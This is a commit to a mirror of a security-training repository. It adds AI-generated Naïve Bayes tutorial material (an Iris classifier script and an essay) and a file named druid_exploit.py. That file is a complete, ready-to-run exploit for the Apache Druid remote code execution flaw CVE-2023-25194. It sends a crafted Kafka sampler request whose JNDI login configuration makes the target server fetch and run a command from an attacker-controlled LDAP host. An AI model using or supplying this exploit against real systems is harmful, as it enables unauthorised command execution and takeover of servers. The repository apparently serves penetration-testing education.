mirror of https://github.com/The-Art-of-Hacking/h4cker.git (synced 2024-12-18 19:06:08 +00:00)
adding more examples
This commit is contained in:
parent
99a0fce025
commit
03afe63f9c
42
ai_security/ML_Fundamentals/ai_generated/Naïve_Bayes.py
Normal file
@@ -0,0 +1,42 @@
The following is a Python script that demonstrates the Naïve Bayes algorithm using the famous Iris dataset:
```python
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score

# Load the Iris dataset
iris = load_iris()

# Split the dataset into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target, test_size=0.2, random_state=42)

# Create an instance of the Naïve Bayes classifier
classifier = GaussianNB()

# Train the classifier using the training data
classifier.fit(X_train, y_train)

# Make predictions on the testing data
y_pred = classifier.predict(X_test)

# Calculate accuracy of the model
accuracy = accuracy_score(y_test, y_pred)
print("Accuracy:", accuracy)
```
In this script, we start by importing the necessary libraries: `numpy` for numerical operations, `sklearn.datasets` to load the Iris dataset, `sklearn.model_selection` to split the data into training and testing sets, `sklearn.naive_bayes` for the Naïve Bayes classifier, and `sklearn.metrics` for calculating accuracy.

Next, we load the Iris dataset using the `load_iris()` function. Then we split the data into training and testing sets using the `train_test_split()` function, where `test_size=0.2` indicates that 20% of the data will be used for testing.
We create an instance of the Naïve Bayes classifier using `GaussianNB()`. This classifier assumes that features follow a Gaussian distribution. If your data doesn't meet this assumption, you can explore other variants like multinomial or Bernoulli Naïve Bayes.
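For instance, a minimal sketch of swapping in the multinomial variant, reusing the variables from the script above (purely illustrative here, since the Iris features are continuous measurements rather than counts):

```python
from sklearn.naive_bayes import MultinomialNB

# MultinomialNB expects non-negative, count-like features (e.g., word counts).
# The Iris measurements happen to be non-negative, so this runs, but GaussianNB
# remains the better fit for continuous data.
mnb = MultinomialNB()
mnb.fit(X_train, y_train)
print("MultinomialNB accuracy:", accuracy_score(y_test, mnb.predict(X_test)))
```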
We train the classifier using the training data by calling the `fit()` method and passing in the features (`X_train`) and corresponding labels (`y_train`).

Then, we make predictions on the testing data using the `predict()` method and passing in the features of the test set (`X_test`).

Finally, we calculate the accuracy of the classifier by comparing the predicted labels with the true labels from the testing set using the `accuracy_score()` function.
Hope this helps to demonstrate the Naïve Bayes algorithm in Python!
23
ai_security/ML_Fundamentals/ai_generated/data/Naïve_Bayes.md
Normal file
@@ -0,0 +1,23 @@
Naïve Bayes: A Simple Yet Powerful Algorithm for Classification
In the field of machine learning, one algorithm stands out for its simplicity and effectiveness in solving classification problems: Naïve Bayes. Named after the 18th-century mathematician Thomas Bayes, the Naïve Bayes algorithm is based on Bayes' theorem and has become a popular choice for various applications, including spam filtering, sentiment analysis, document categorization, and medical diagnosis.
The essence of Naïve Bayes lies in its ability to predict the probability of a certain event occurring based on the prior knowledge of related events. It is particularly useful in scenarios where the features used for classification are independent of each other. Despite its simplifying assumption, Naïve Bayes has proven to be remarkably accurate in practice, often outperforming more complex algorithms.

But how does Naïve Bayes work? Let's delve into its inner workings.
Bayes' theorem, at the core of Naïve Bayes, allows us to compute the probability of a certain event A given the occurrence of another event B, based on the prior probability of A and the conditional probability of B given A. In classification problems, we aim to determine the most likely class given a set of observed features. Naïve Bayes assumes that these features are conditionally independent, which simplifies the calculations significantly.
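In symbols, Bayes' theorem reads P(A|B) = P(B|A) * P(A) / P(B). A tiny worked example with made-up spam-filter numbers:

```python
# Bayes' theorem: P(A|B) = P(B|A) * P(A) / P(B)
# Hypothetical numbers, chosen only for illustration.
p_spam = 0.3                # prior P(A): 30% of all mail is spam
p_free_given_spam = 0.6     # P(B|A): the word "free" appears in 60% of spam
p_free = 0.25               # P(B): the word "free" appears in 25% of all mail

p_spam_given_free = p_free_given_spam * p_spam / p_free
print(p_spam_given_free)    # about 0.72: a mail containing "free" is probably spam
```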
The algorithm starts by collecting a labeled training dataset, where each instance belongs to a class label. For instance, in a spam filtering task, the dataset would consist of emails labeled as "spam" or "not spam" based on their content. Naïve Bayes then calculates the prior probability of each class by counting the occurrences of different classes in the training set and dividing it by the total number of instances.
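A minimal sketch of this prior-estimation step, using a tiny hypothetical label list:

```python
from collections import Counter

# Hypothetical training labels for a spam filter.
labels = ["spam", "not spam", "spam", "spam", "not spam"]

# Prior of each class = its relative frequency in the training set.
priors = {cls: count / len(labels) for cls, count in Counter(labels).items()}
print(priors)  # {'spam': 0.6, 'not spam': 0.4}
```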
Next, Naïve Bayes estimates the likelihood of each feature given the class. It computes the conditional probability of observing a given feature for each class, again counting the occurrences and dividing it by the total number of instances belonging to that class. This step assumes that the features are conditionally independent, a simplification that allows efficient computation in practice.
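Continuing the hypothetical spam example, the likelihoods can be estimated with the same kind of counting:

```python
from collections import Counter, defaultdict

# Hypothetical (word, class) observations from the training set.
observations = [("free", "spam"), ("free", "spam"), ("hello", "not spam"),
                ("meeting", "not spam"), ("free", "not spam")]

word_counts = defaultdict(Counter)   # per-class word counts
class_counts = Counter()             # instances per class
for word, cls in observations:
    word_counts[cls][word] += 1
    class_counts[cls] += 1

# P(word | class) = count(word in class) / count(class)
likelihoods = {cls: {w: n / class_counts[cls] for w, n in counts.items()}
               for cls, counts in word_counts.items()}
print(likelihoods["not spam"]["free"])  # 0.333..., i.e. 1 of 3 "not spam" instances
```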
To make a prediction for a new instance, Naïve Bayes combines the prior probability of each class with the probabilities of observing the features given that class using Bayes' theorem. The class with the highest probability is assigned as the predicted class for the new instance.
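Putting the pieces together, a toy prediction step (assuming the priors and likelihoods below were estimated as described above; all numbers are hypothetical) might look like:

```python
priors = {"spam": 0.6, "not spam": 0.4}
likelihoods = {
    "spam":     {"free": 0.8, "meeting": 0.1},
    "not spam": {"free": 0.2, "meeting": 0.5},
}

def predict(features):
    scores = {}
    for cls, prior in priors.items():
        score = prior
        for feature in features:
            # A tiny floor keeps unseen features from zeroing out the whole score.
            score *= likelihoods[cls].get(feature, 1e-9)
        scores[cls] = score
    # The class with the highest combined score wins.
    return max(scores, key=scores.get)

print(predict(["free"]))     # 'spam'
print(predict(["meeting"]))  # 'not spam'
```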
One of the advantages of Naïve Bayes is its ability to handle high-dimensional datasets efficiently, making it particularly suitable for text classification tasks where the number of features can be large. It also requires a relatively small amount of training data to estimate the parameters accurately.
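For example, a small scikit-learn text-classification sketch (with a made-up four-document corpus) shows how naturally Naïve Bayes handles many sparse word-count features:

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import make_pipeline

# Tiny made-up corpus; real tasks would use thousands of documents.
texts = ["win money now", "meeting at noon", "cheap money offer", "project meeting agenda"]
labels = ["spam", "not spam", "spam", "not spam"]

model = make_pipeline(CountVectorizer(), MultinomialNB())
model.fit(texts, labels)
print(model.predict(["cheap money now"]))  # expected: ['spam']
```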
However, Naïve Bayes does have some limitations. Its assumption of feature independence might not hold true in real-world scenarios, leading to suboptimal performance. Additionally, it is known to struggle with instances that contain unseen features, as it assigns zero probability to them. Techniques such as Laplace smoothing can be applied to address this issue.
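A quick sketch of Laplace (add-one) smoothing with hypothetical word counts:

```python
# Laplace (add-one) smoothing: add alpha to every count so that words never
# seen in a class still receive a small non-zero probability.
alpha = 1.0
vocabulary = ["free", "hello", "meeting"]          # hypothetical vocabulary
spam_word_counts = {"free": 2, "hello": 0, "meeting": 0}
total_spam_words = sum(spam_word_counts.values())  # 2

smoothed = {
    word: (spam_word_counts[word] + alpha) / (total_spam_words + alpha * len(vocabulary))
    for word in vocabulary
}
print(smoothed)  # {'free': 0.6, 'hello': 0.2, 'meeting': 0.2}
```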
Despite these limitations, Naïve Bayes remains a popular and frequently employed algorithm in machine learning due to its simplicity, efficiency, and competitive performance. Its ability to handle large-scale datasets and its resilience to irrelevant features make it a go-to choice for many classification tasks.

In conclusion, Naïve Bayes is a simple yet powerful algorithm that leverages Bayes' theorem and the assumption of feature independence to solve classification problems efficiently. While it has its limitations, Naïve Bayes continues to shine in various real-world applications, showcasing the strength of simplicity in the field of machine learning.
131
web_application_testing/additional_exploits/druid_exploit.py
Normal file
@@ -0,0 +1,131 @@
'''
This script exploits the Druid RCE vulnerability (CVE-2023-25194) to execute commands on the target machine.
'''
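# Example usage (placeholder addresses; assumes a JNDI/LDAP exploitation server
# is already listening on the -j host, port 1389):
#   python3 druid_exploit.py -t 10.0.0.5 -j 10.0.0.6 -c "id"
# The -c command is base64-encoded by the script before being embedded in the JNDI URL.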
import argparse
import base64
import requests
import json


def send_post_request(url, headers, data):
    '''
    Send the POST request and check the response for signs of successful exploitation.
    :param url: target URL
    :param headers: request headers
    :param data: request body (dict, serialized to JSON)
    :return: None
    '''
    response = requests.post(url, headers=headers, data=json.dumps(data))

    status_code = response.status_code
    content = response.content.decode('utf-8')

    if status_code == 500 or 'createChannelBuilde' in content:
        print('[+] Exploit Success ~')
    else:
        print('[-] Exploit may have failed.')


def get_data(jndi_ip, cmd):
    '''
    Build the JSON body for the POST request.
    :param jndi_ip: IP of the attacker-controlled JNDI/LDAP server
    :param cmd: base64-encoded command to execute
    :return: data dict
    '''
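    # The "sasl.jaas.config" property below abuses JndiLoginModule so that the
    # Kafka client embedded in Druid performs a JNDI lookup against the attacker's
    # LDAP server (ldap://<jndi_ip>:1389/...), which is expected to serve a payload
    # that runs the base64-encoded command.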
    data = {
        "type": "kafka",
        "spec": {
            "type": "kafka",
            "ioConfig": {
                "type": "kafka",
                "consumerProperties": {
                    "bootstrap.servers": "127.0.0.1:6666",
                    "sasl.mechanism": "SCRAM-SHA-256",
                    "security.protocol": "SASL_SSL",
                    "sasl.jaas.config": f"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://{jndi_ip}:1389/Basic/Command/base64/{cmd}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
                },
                "topic": "test",
                "useEarliestOffset": True,
                "inputFormat": {
                    "type": "regex",
                    "pattern": "([\\s\\S]*)",
                    "listDelimiter": "56616469-6de2-9da4-efb8-8f416e6e6965",
                    "columns": [
                        "raw"
                    ]
                }
            },
            "dataSchema": {
                "dataSource": "sample",
                "timestampSpec": {
                    "column": "!!!_no_such_column_!!!",
                    "missingValue": "1970-01-01T00:00:00Z"
                },
                "dimensionsSpec": {},
                "granularitySpec": {
                    "rollup": False
                }
            },
            "tuningConfig": {
                "type": "kafka"
            }
        },
        "samplerConfig": {
            "numRows": 500,
            "timeoutMs": 15000
        }
    }
    # print(data)
    return data
def base64_encode(original_str):
    '''
    Encode a string with base64.
    :param original_str: original string
    :return: base64-encoded string
    '''
    original_bytes = original_str.encode('utf-8')
    encoded_bytes = base64.b64encode(original_bytes)
    encoded_str = encoded_bytes.decode('utf-8')
    return encoded_str
if __name__ == '__main__':
    '''
    The following arguments are required for the script to run successfully:
    -t, --target: target IP or hostname
    -j, --jndi-ip: IP of the attacker-controlled JNDI/LDAP server
    -c, --cmd: command to execute
    '''
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', type=str, required=True, help='target IP or hostname')
    parser.add_argument('-j', '--jndi-ip', type=str, required=True, help='IP of the JNDI/LDAP server')
    parser.add_argument('-c', '--cmd', type=str, required=True, help='command to execute')
    args = parser.parse_args()

    # Target URL
    url = f"http://{args.target}:8888/druid/indexer/v1/sampler"
    print("[+] URL: " + url)
    print("[+] Target IP: " + args.target)
    print("[+] JNDI IP: " + args.jndi_ip)
    print("[+] Command: " + args.cmd)

    # Headers for the POST request
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Accept-Language": "en-US;q=0.9,en;q=0.8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36",
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "Content-Type": "application/json"
    }

    # Build the POST request body
    data = get_data(args.jndi_ip, base64_encode(args.cmd))

    # Send the POST request
    send_post_request(url, headers, data)